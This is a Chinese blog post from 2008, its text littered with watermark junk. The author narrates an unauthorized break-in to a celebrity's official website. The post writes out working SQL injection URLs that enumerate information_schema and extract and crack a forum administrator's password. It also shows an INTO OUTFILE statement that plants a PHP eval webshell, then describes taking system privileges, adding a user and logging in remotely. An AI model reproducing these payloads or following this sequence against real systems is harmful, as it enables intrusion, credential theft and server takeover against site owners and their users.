检测周杰伦官方网站

上一篇 / 下一篇  2008-12-01 07:44:16

查看( 41 ) / 评论( 0 ) / 评分( 0 / 0 )
文章作者:风流倜傥IXPUB技术博客!FcoG$QL2W1R
某日在cn群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。IXPUB技术博客s.YjT`a2V
看注射点,老规矩,先提交个单引号,返回错误提示是IXPUB技术博客L$}7Y#\Bku
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1IXPUB技术博客x'M MQ~"I)@
这个提示是很有玄机的,可以看到单引号没有转意,也就是说安全模式没有打开,这为我们后文得到webshell提供了机会。
@N c3l?#m*E5j0    下面猜字段吧,体力活的说IXPUB技术博客WqMJ!M
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,4 
 

3n@)D*vM$x%f1T0很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
NM8B!v`0http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,version()IXPUB技术博客!pa pm%JO;U sP
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,3,user()IXPUB技术博客Yi8fB!o
Oh yeah!!是mysql5的root权限,看到这里我觉得服务器拿下应该问题不大了。IXPUB技术博客4J2z6W*`/g;s
和mssql、oracle、db2等数据库一样,mysql5提供了一个系统数据库:information_schema
i&L"e5Ul"q7^s*u$V"i0在这个数据库里我们可以得到很多信息,包括当前用户权限、当前用户权限下可以访问的数据库、表、列名,因此在sql注射中,导致直接暴区数据库,表列名
U!e2EP,D Z#o0开始操作,提交IXPUB技术博客!K$w0zm#W}S3e
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/*IXPUB技术博客Ij!H(_'lN#|
貌似没有出现想象中的效果
%{}OrO'`!|u4n0提示
(zZr F-_8L0Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'IXPUB技术博客,Dhn*A&wZE
看来是union 前后字符集不搭配,只好编码一下了,提交
r1{aL#r5O!G%y&[0http://www.jay2u.com/jaynews/ind ... 0union%20select%201,hex(TABLE_SCHEMA),hex(TABLE_NAME),hex(COLUMN_NAME)%20%20from%20information_schema.STATISTICS/*IXPUB技术博客P`d,{G,S
这次正常了,连上我自己的mysql,将16进制的编码还原IXPUB技术博客*q^&x\/nY
 
 

?4q_i'[)DktF5o0mysql> select 0x6A6179776562;
E:y^4^x'BJPMe*H,K }0+----------------+
T+_TB@y M0| 0x6A6179776562 |
T XVL#~q_r0+----------------+IXPUB技术博客9]*HC V*\3Vx%h"|
| jayweb        |IXPUB技术博客3toVgHn)~:S C
+----------------+
~pc*x'E#|!Y9]01 row in set (0.00 sec)IXPUB技术博客2z9G o!c#[d@s
mysql> select 0x41646D696E5F4964;
D Rm4AJ#R y%c0+--------------------+
p$GM;aB!N7`6\ M0| 0x41646D696E5F4964 |
C"K P'D f?,k$Y MM`f0+--------------------+
"]:I7b'nM0K9W0| Admin_Id          |IXPUB技术博客1~j-vu%A @g
+--------------------+IXPUB技术博客2\1A wu A.C"?
1 row in set (0.00 sec)
ccnJU0mysql> select 0x61646D696E;
3E8R4ZkXFzjn0+--------------+IXPUB技术博客2b{4x7iy1E?8F%k
| 0x61646D696E |IXPUB技术博客|m,^2E+Ux ~ns-m
+--------------+
.A L s p @Js0]0| admin        |IXPUB技术博客)uHIe/|(Zt ju
+--------------+
2T:z%m|dJ01 row in set (0.00 sec)
A)R.P3^7|"wFB(f0这里表名出来了,是admin,但是没有暴出密码字段名,我们可以通过使用limit语法逐个表和字段查询,但是数据库很多表的话,不晓得什么时候才能摸清楚。刚好网站上有个phpbb的论坛,还是通过跨库查论坛数据库吧。
m,f4c4UNo/Z1I0看了下,管理员有一个admin一个webmater,看样子webmater比较活跃,就查他的密码了。
%m,N3V\6}:|'t0提交
sN x,X9|m0http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,username,user_password%20%20from%20phpbb_users%20where%20user_id=66333IXPUB技术博客7x1p}0F-C ?
到www.cmd5.com上查询出来密码是 :042990IXPUB技术博客T,F+Xz.kN!nwG
登陆后台去参观下吧 :)IXPUB技术博客,Ra3^S@-Ku
 
 

i)G8A7q$T?0在后台琢磨了半天,尝试了添加上传类型等办法都没能得到webshell,难道只能渗透到这个程度吗?
~H;?G:N+CO,L0喝杯水冷静了下,想起来我已经知道它的安全模式是关闭的而且我们有足够的权限,这意味着什么?嘿嘿,只要知道路径就能通过注射导出一个webshell。现在的问题就是得到路径了,利用uploadpic.php中getimagesize()函数的小bug,先在后台添加上传类型 text/asa,然后到前台传图片的地方传个asa文件,这个函数无法读取起大小,暴出错误时泄露了绝对路径
!d(M!Q1NP9j:n0下面最辉煌的时刻终于要到来了,构造导出webshell的语句IXPUB技术博客-JgB G[L#H~:K
http://www.jay2u.com/jaynews/ind ... 0union%20select%201,2,'<?eval($_POST[cmd])?>',4%20from%20mysql.user%20into%20outfile%20'D:\\website\\jayweb\\forum\\userpix\\cnsst.php'/*IXPUB技术博客'{N~ AFcoD
成功了!!IXPUB技术博客k1W;m Cz
用客户端连上,传了个大马IXPUB技术博客jI5u!t'dE'}J
由于编码问题看着有点乱,一样使用,执行命令看看
ZiP-mh4oq#p0 
 

.\%x2`]3I4YN0好象服务器的php是系统权限的,添加了一个用户
)l%T6dUv.?T0连上3389参观下闪人
+M^6]?9i2GBa0 

4

4

导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar